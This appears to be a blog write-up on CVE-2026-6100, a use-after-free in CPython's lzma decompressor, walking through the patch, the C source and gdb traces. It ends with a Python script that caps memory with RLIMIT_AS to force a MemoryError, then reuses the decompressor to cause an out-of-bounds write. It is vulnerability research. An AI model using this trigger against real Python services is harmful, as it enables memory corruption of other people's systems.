Exploiting CVE-2026-6100 for Amusement and Misery
So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours a day on Twitter dot com, usually ranging from 1h to 2h. I open the app up to 125 times a day, with an average of about 90 opens, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more right-skewed than that, ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.
Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:
Fig: The Tweet
I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!
The Bug
The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.
Anyway, let’s read the CVE report and try to understand what’s going on.
The CVE Report
The CVE report in full reads as such:
Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure
Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.
So, some things to note:
- This is exploitable under “memory pressure”. This… will become important later.
- This requires the reuse of a decompressor instance even after a MemoryError occurs.
- This affects the Python implementations of LZMA, BZ2 and Gzip, which implies some shared logic fault in their implementations.
- Not included in the Description but instead down below under the CWEs, it’s stated that this is both a UAF and an OOB Write. Huh!
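Read from the defender's side, the report boils down to one rule: once a decompressor has raised a MemoryError, throw it away. A minimal sketch of a streaming loop that follows that rule (decompress_stream is a made-up helper name for illustration, not something the lzma module provides):

```python
import lzma


def decompress_stream(chunks):
    """Decompress an iterable of byte chunks with one LZMADecompressor.

    If any call raises MemoryError, the instance is dropped and never
    touched again, which is the usage the CVE report describes as safe.
    """
    decompressor = lzma.LZMADecompressor()
    pieces = []
    try:
        for chunk in chunks:
            pieces.append(decompressor.decompress(chunk))
    except MemoryError:
        # The instance may be holding a stale input pointer: discard it.
        decompressor = None
        raise
    return b"".join(pieces)


plain = b"needy streamer overload " * 64
payload = lzma.compress(plain)
result = decompress_stream([payload[:40], payload[40:]])
```

The exploit path in the rest of this post is exactly the opposite pattern: catch the MemoryError, keep the instance, call decompress again.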
Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.
The Fix
Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.
Fig: The Fixes
In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.
LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.
Understanding _lzmamodule.c
We’re reverse engineers, so we read our code in reverse too!
Let’s start from the very end, the error block that we’re so concerned with:
...
error:
    lzs->next_in = NULL;
    Py_XDECREF(result);
    return NULL;
}
Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:
    /* Allocate if necessary */
    if (d->input_buffer == NULL) {
        d->input_buffer = PyMem_Malloc(lzs->avail_in);
        if (d->input_buffer == NULL) {
            PyErr_SetNone(PyExc_MemoryError);
            goto error;
        }
        d->input_buffer_size = lzs->avail_in;
    }
So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting size lzs->avail_in, which on failure will raise a MemoryError and jump to the error block. So far, so good. What the fuck are d and lzs?
static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
...
Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:
typedef struct {
    PyObject_HEAD
    lzma_allocator alloc;
    lzma_stream lzs;
    int check;
    char eof;
    PyObject *unused_data;
    char needs_input;
    uint8_t *input_buffer;
    size_t input_buffer_size;
    PyMutex mutex;
} Decompressor;
But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:
typedef struct {
const uint8_t *next_in; /**< Pointer to the next input byte. */
size_t avail_in; /**< Number of available input bytes in next_in. */
uint64_t total_in; /**< Total number of bytes read by liblzma. */
uint8_t *next_out; /**< Pointer to the next output position. */
size_t avail_out; /**< Amount of free space in next_out. */
uint64_t total_out; /**< Total number of bytes written by liblzma. */
lzma_allocator *allocator;
/** Internal state is not visible to applications. */
lzma_internal *internal;
void *reserved_ptr1;
void *reserved_ptr2;
void *reserved_ptr3;
void *reserved_ptr4;
uint64_t reserved_int1;
uint64_t reserved_int2;
size_t reserved_int3;
size_t reserved_int4;
lzma_reserved_enum reserved_enum1;
lzma_reserved_enum reserved_enum2;
} lzma_stream;
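Since I'll be staring at raw offsets in a debugger soon enough, here is a rough ctypes mirror of both structs to predict where the fields land. This is a sketch under assumptions, not ground truth: it assumes a 64-bit Linux build, a 16-byte PyObject_HEAD (no free-threading), a one-byte PyMutex, and enums the size of an int. The class names are mine.

```python
import ctypes


class LzmaAllocator(ctypes.Structure):
    # liblzma's lzma_allocator: two function pointers plus an opaque pointer
    _fields_ = [("alloc", ctypes.c_void_p),
                ("free", ctypes.c_void_p),
                ("opaque", ctypes.c_void_p)]


class LzmaStream(ctypes.Structure):
    _fields_ = [("next_in", ctypes.c_void_p),
                ("avail_in", ctypes.c_size_t),
                ("total_in", ctypes.c_uint64),
                ("next_out", ctypes.c_void_p),
                ("avail_out", ctypes.c_size_t),
                ("total_out", ctypes.c_uint64),
                ("allocator", ctypes.c_void_p),
                ("internal", ctypes.c_void_p),
                ("reserved_ptrs", ctypes.c_void_p * 4),
                ("reserved_int1", ctypes.c_uint64),
                ("reserved_int2", ctypes.c_uint64),
                ("reserved_int3", ctypes.c_size_t),
                ("reserved_int4", ctypes.c_size_t),
                ("reserved_enum1", ctypes.c_int),
                ("reserved_enum2", ctypes.c_int)]


class Decompressor(ctypes.Structure):
    _fields_ = [("ob_refcnt", ctypes.c_ssize_t),  # PyObject_HEAD, assumed 16 bytes
                ("ob_type", ctypes.c_void_p),
                ("alloc", LzmaAllocator),
                ("lzs", LzmaStream),
                ("check", ctypes.c_int),
                ("eof", ctypes.c_char),
                ("unused_data", ctypes.c_void_p),
                ("needs_input", ctypes.c_char),
                ("input_buffer", ctypes.c_void_p),
                ("input_buffer_size", ctypes.c_size_t),
                ("mutex", ctypes.c_uint8)]        # PyMutex, assumed one byte


lzs_offset = Decompressor.lzs.offset
input_buffer_offset = Decompressor.input_buffer.offset
print(hex(lzs_offset), hex(input_buffer_offset))
```

Under those assumptions lzs sits at 0x28 and input_buffer at 0xc8, which lines up with the `add rax, 0x28` and `[rdx+0xc8]` operands that show up in the disassembly further down.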
Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.
static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;

    /* Prepend unconsumed input if necessary */
    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);
        ...
        /* BLAH BLAH BLAH */
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }
    else {
        lzs->next_in = data;
        lzs->avail_in = len;
        input_buffer_in_use = 0;
    }

    result = decompress_buf(d, max_length);
    if (result == NULL) {
        lzs->next_in = NULL;
        return NULL;
    }
...
I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumed input if necessary”, implying this is unlikely to be hit on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.
The Python code that would call this function would look a little like this:
import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)
Where data and len are drawn from, well, the data you pass in.
This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.
/* Decompress data of length d->lzs.avail_in in d->lzs.next_in. The output
   buffer is allocated dynamically and returned. At most max_length bytes are
   returned, so some of the input may not be consumed. d->lzs.next_in and
   d->lzs.avail_in are updated to reflect the consumed input. */
static PyObject*
decompress_buf(Decompressor *d, Py_ssize_t max_length)
{
    PyObject *result;
    lzma_stream *lzs = &d->lzs;
    _BlocksOutputBuffer buffer = {.writer = NULL};
    _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
    assert(state != NULL);

    if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
        goto error;
    }

    for (;;) {
        lzma_ret lzret;

        Py_BEGIN_ALLOW_THREADS
        lzret = lzma_code(lzs, LZMA_RUN);
        Py_END_ALLOW_THREADS

        if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
            lzret = LZMA_OK; /* That wasn't a real error */
        }
        if (catch_lzma_error(state, lzret)) {
            goto error;
        }
        if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
            FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
        }
        if (lzret == LZMA_STREAM_END) {
            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
            break;
        } else if (lzs->avail_out == 0) {
            /* Need to check lzs->avail_out before lzs->avail_in.
               Maybe lzs's internal state still have a few bytes
               can be output, grow the output buffer and continue
               if max_lengh < 0. */
            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
                break;
            }
            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
                goto error;
            }
        } else if (lzs->avail_in == 0) {
            break;
        }
    }

    result = OutputBuffer_Finish(&buffer, lzs->avail_out);
    if (result != NULL) {
        return result;
    }

error:
    OutputBuffer_OnError(&buffer);
    return NULL;
}
We need this function to succeed: if it fails and returns NULL, the rest of our decompress call gets killed off (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring actually does elucidate further:
If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.
So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.
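A tiny sketch of that behaviour with the public API, nothing exploit-y yet. It caps the first call at a single byte of output, then drains the rest with an empty input. The variable names are mine.

```python
import lzma

plain = b"asdfgda"
blob = lzma.compress(plain)

d = lzma.LZMADecompressor()

# First call: hand over the whole stream but ask for at most one byte back.
first = d.decompress(blob, 1)
needs_input_after_first = d.needs_input
eof_after_first = d.eof

# Second call: no new input and no output cap, so the leftover input that the
# decompressor kept around from the first call gets consumed.
rest = d.decompress(b"")

print(first, needs_input_after_first, eof_after_first)
print(rest, d.eof)
```

The interesting part for us is the state between the two calls: the decompressor is still holding unconsumed input, which is what the C code has to stash somewhere.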
Looking at the if blocks that come after, we can see what conditions we need to miss:
    if (d->eof) {
        FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
        if (lzs->avail_in > 0) {
            PyObject *unused_data = PyBytes_FromStringAndSize(
                (char *)lzs->next_in, lzs->avail_in);
            if (unused_data == NULL) {
                goto error;
            }
            Py_XSETREF(d->unused_data, unused_data);
        }
    }
    else if (lzs->avail_in == 0) {
        lzs->next_in = NULL;

        if (lzs->avail_out == 0) {
            /* (avail_in==0 && avail_out==0)
               Maybe lzs's internal state still have a few bytes can
               be output, try to output them next time. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);

            /* If max_length < 0, lzs->avail_out always > 0 */
            assert(max_length >= 0);
        } else {
            /* Input buffer exhausted, output buffer has space. */
            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
        }
    }
    else {
        // the actual block we want to hit
        ...
So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.
Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.
Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:
    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;

        /* Number of bytes we can append to input buffer */
        avail_now = (d->input_buffer + d->input_buffer_size)
            - (lzs->next_in + lzs->avail_in);

        /* Number of bytes we can append if we move existing
           contents to beginning of buffer (overwriting
           consumed input) */
        avail_total = d->input_buffer_size - lzs->avail_in;

        if (avail_total < len) {
            size_t offset = lzs->next_in - d->input_buffer;
            uint8_t *tmp;
            size_t new_size = d->input_buffer_size + len - avail_now;

            /* Assign to temporary variable first, so we don't
               lose address of allocated buffer if realloc fails */
            tmp = PyMem_Realloc(d->input_buffer, new_size);
            if (tmp == NULL) {
                PyErr_SetNone(PyExc_MemoryError);
                return NULL;
            }
            d->input_buffer = tmp;
            d->input_buffer_size = new_size;

            lzs->next_in = d->input_buffer + offset;
        }
        else if (avail_now < len) {
            memmove(d->input_buffer, lzs->next_in,
                    lzs->avail_in);
            lzs->next_in = d->input_buffer;
        }
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }
Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!
Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too:
- Somehow trigger the MemoryError for PyMem_Malloc(lzs->avail_in).
- Call decompress on the same Decompressor object with the residual data in the lzs struct, which should trigger an OOB Write of arbitrary data to the position right after the original data.
So, shall we?
Pressure Torture
On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.
Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”.
Let’s do a little bit of debugging to figure out how we can attain that pressure.
Tracing the decompress Call
I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.
However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.
Let’s write a simple script to test the decompress function:
import lzma
decompressor = lzma.LZMADecompressor()
# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)
We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d0db <decompress+000c> mov QWORD PTR [rbp-0x70], rsi
   0x7ffff7b2d0df <decompress+0010> mov QWORD PTR [rbp-0x78], rdx
   0x7ffff7b2d0e3 <decompress+0014> mov QWORD PTR [rbp-0x80], rcx
●→ 0x7ffff7b2d0e7 <decompress+0018> mov rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d0eb <decompress+001c> add rax, 0x28
   0x7ffff7b2d0ef <decompress+0020> mov QWORD PTR [rbp-0x50], rax
   0x7ffff7b2d0f3 <decompress+0024> mov rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d0f7 <decompress+0028> mov rax, QWORD PTR [rax]
   0x7ffff7b2d0fa <decompress+002b> test rax, rax
──────────────────────────────────────── source:../Modules/_lzmamodule.c+988 ────
    983  static PyObject *
    984  decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
    985  {
    986      char input_buffer_in_use;
    987      PyObject *result;
         // d=0x00007fffffff9ea8 → [...] → 0x0000000000000002, lzs=0x00007fffffff9ec0 → 0x0000000001000000
 →  988      lzma_stream *lzs = &d->lzs;
    989
    990      /* Prepend unconsumed input if necessary */
    991      if (lzs->next_in != NULL) {
    992          size_t avail_now, avail_total;
    993
──────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffff7b2d0e7 in decompress (), reason: BREAKPOINT
Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:
gef➤ print *(lzma_stream *) 0x00007ffff7c2e468
$3 = {
  next_in = 0x0,
  avail_in = 0x0,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
  total_out = 0x0,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}
and it will get filled in with our input compressed data once we go further in:
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d29d <decompress+01ce> mov rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2a1 <decompress+01d2> mov rdx, QWORD PTR [rbp-0x78]
   0x7ffff7b2d2a5 <decompress+01d6> mov QWORD PTR [rax+0x8], rdx
 → 0x7ffff7b2d2a9 <decompress+01da> mov BYTE PTR [rbp-0x51], 0x0
   0x7ffff7b2d2ad <decompress+01de> mov rdx, QWORD PTR [rbp-0x80]
   0x7ffff7b2d2b1 <decompress+01e2> mov rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d2b5 <decompress+01e6> mov rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call 0x7ffff7b2cec7 <decompress_buf>
──────────────────────────────────────── source:../Modules/_lzmamodule.c+1032 ────
   1027          input_buffer_in_use = 1;
   1028      }
   1029      else {
   1030          lzs->next_in = data;
   1031          lzs->avail_in = len;
         // input_buffer_in_use=0x0
 → 1032          input_buffer_in_use = 0;
   1033      }
   1034
   1035      result = decompress_buf(d, max_length);
   1036      if (result == NULL) {
   1037          lzs->next_in = NULL;
...
────────────────────────────────────────
gef➤ print *(lzma_stream *) 0x00007ffff7c2e468
$4 = {
  next_in = 0x7ffff77b9ce0 "\3757zXZ",
  avail_in = 0x40,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
...
We continue execution past decompress_buf to see how this changes our structs:
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d2b5 <decompress+01e6> mov rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call 0x7ffff7b2cec7 <decompress_buf>
●→ 0x7ffff7b2d2c0 <decompress+01f1> mov QWORD PTR [rbp-0x20], rax
   0x7ffff7b2d2c4 <decompress+01f5> cmp QWORD PTR [rbp-0x20], 0x0
   0x7ffff7b2d2c9 <decompress+01fa> jne 0x7ffff7b2d2e0 <decompress+529>
   0x7ffff7b2d2cb <decompress+01fc> mov rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2cf <decompress+0200> mov QWORD PTR [rax], 0x0
   0x7ffff7b2d2d6 <decompress+0207> mov eax, 0x0
...
gef➤ print *(Decompressor *)0x00007fffffff9ea8
$5 = {
  ob_base = {
    {
      ob_refcnt_full = 0x7ffff7c2e440,
      {
        ob_refcnt = 0xf7c2e440,
        ob_overflow = 0x7fff,
        ob_flags = 0x0
      },
      _aligner = 0x40
    },
    ob_type = 0x7fffffff9ed0
  },
...
  check = 0xf7b2c04f,
  eof = 0xff,
  unused_data = 0x0,
  needs_input = 0x2,
  input_buffer = 0x7fffffffa1c0 "\300\234{\367\377\177",
  input_buffer_size = 0x7ffff7c2e440,
  mutex = {
    _bits = 0xa0
  }
}
gef➤ print *(lzma_stream *)0x7ffff7c2e468
$7 = {
  next_in = 0x7ffff77b9cfc "sdfgda",
  avail_in = 0x24,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}
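Note that next_in now points at the rest of our plaintext, "sdfgda". This is most likely because the input is so short that LZMA2 just stores it as an uncompressed chunk, so the remaining compressed input literally is the remaining plaintext. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the one byte of output we requested, while total_in goes up to 0x1c as that’s the length we’ve ingested (and thus incremented next_in by, with avail_in dropping from 0x40 to 0x24 to match).
One caveat on the Decompressor dump: 0x00007fffffff9ea8 is the stack slot that holds the pointer d, not the object itself (its first “field” reads 0x7ffff7c2e440, which is exactly the lzs address minus 0x28), so eof = 0xff and friends are stack garbage. The real d->eof is still 0 since we never reached LZMA_STREAM_END, and lzs->avail_in is non-zero, which means we will very cleanly fall into our target block to trigger the bug!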
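To sanity check the bookkeeping in that dump, here is a quick sketch that redoes the arithmetic with the values copied out of gdb and pokes at the compressed blob itself. The slice at the end is my own way of checking whether the plaintext sits verbatim inside the .xz stream (which is what an uncompressed LZMA2 chunk would look like); treat it as an observation about this one tiny input, not a general property.

```python
import lzma

blob = lzma.compress(b"asdfgda")

# Values copied from the gdb session above
next_in_before, avail_in_before = 0x7ffff77b9ce0, 0x40
next_in_after, avail_in_after, total_in = 0x7ffff77b9cfc, 0x24, 0x1c

# How far next_in advanced, and how much avail_in shrank
consumed = next_in_after - next_in_before
shrunk = avail_in_before - avail_in_after
print(hex(consumed), hex(shrunk), hex(total_in))

# The bytes right after the consumed prefix of the compressed stream
leftover_head = blob[total_in:total_in + 6]
print(len(blob), leftover_head)
```

All three numbers on the first line should agree, and the leftover bytes should match the string gdb printed for next_in.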
Making PyMem_Malloc Fail
So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.
This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.
So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.
We can artificially restrict the resource limits of a Python script with the following:
import resource
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = 64 * 1024 * 1024 # 64 MB
# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
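Since I'll be flipping this limit on and off a lot, a small context manager keeps it tidy. This is a sketch of my own (address_space_cap is a made-up name), and it assumes Linux, where RLIMIT_AS is enforced. It only ever touches the soft limit, because an unprivileged process that lowers its hard limit cannot raise it back.

```python
import contextlib
import resource


@contextlib.contextmanager
def address_space_cap(limit_bytes):
    """Temporarily set the soft RLIMIT_AS, leaving the hard limit alone."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, hard))
    try:
        yield
    finally:
        # Restoring works because the hard limit was never lowered.
        resource.setrlimit(resource.RLIMIT_AS, (soft, hard))
```

Usage is just `with address_space_cap(64 * 1024 * 1024): ...` around whatever should run starved of memory; the original limits come back when the block exits, even if a MemoryError escapes.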
We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024))), which gives us both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.
import resource
import lzma
# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)
This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x00007ffff7c555dc → 0x0a73000000000001
$rcx : 0x0
$rdx : 0xffffffffffffff80
...
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2644f <decompress+0380> mov rax, QWORD PTR [rax+0x8]
   0x7ffff7b26453 <decompress+0384> mov rdi, rax
   0x7ffff7b26456 <decompress+0387> call 0x7ffff7b234b0 <PyMem_Malloc@plt>
●→ 0x7ffff7b2645b <decompress+038c> mov rdx, QWORD PTR [rbp-0x68]
   0x7ffff7b2645f <decompress+0390> mov QWORD PTR [rdx+0xc8], rax
   0x7ffff7b26466 <decompress+0397> mov rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2646a <decompress+039b> mov rax, QWORD PTR [rax+0xc8]
   0x7ffff7b26471 <decompress+03a2> test rax, rax
   0x7ffff7b26474 <decompress+03a5> jne 0x7ffff7b2648a <decompress+955>
...
Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fall through to our error block, which we do!
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264d4 <decompress+0405> mov rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264d8 <decompress+0409> jmp 0x7ffff7b264ec <decompress+1053>
   0x7ffff7b264da <decompress+040b> nop
 → 0x7ffff7b264db <decompress+040c> mov rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264df <decompress+0410> mov rdi, rax
   0x7ffff7b264e2 <decompress+0413> call 0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
   0x7ffff7b264ed <decompress+041e> ret
──────────────────────────────────────── source:../Modules/_lzmamodule.c+1103 ────
   1098      }
   1099
   1100      return result;
   1101
   1102  error:
         // result=0x00007fffffff9ef0 → [...] → <_PyRuntime+10e80> add BYTE PTR [rax], al
 → 1103      Py_XDECREF(result);
   1104      return NULL;
   1105  }
   1106
   1107  /*[clinic input]
   1108  @permit_long_docstring_body
Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so triggering the bug should be trivial from here!
Triggering the Bug
As we’ve figured out, we need to catch the MemoryError that decompress will throw, then call decompress one more time with some input data, which should get memcpy’d OOB. Let’s update our script to reflect this:
import resource
import lzma
# remember the original limits so we can restore them after the bug triggers
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
# only lower the soft limit: a lowered hard limit can't be raised again later
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
print(f"cap mem at {limit / 1024 / 1024} MB")
# so our memory exhaustion is a bit on the very tight side
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None
try:
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 1)
except MemoryError:
    pass
finally:
    # restore our resources so we struggle less post-bug
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)
We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:
──────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264e2 <decompress+0413> call 0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
 → 0x7ffff7b264ed <decompress+041e> ret
...
gef➤ print *(lzma_stream *)0x7ffff7c2e468
$13 = {
  next_in = 0x7ffff6bda06c "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
  avail_in = 0x100054,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555e53b50,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}
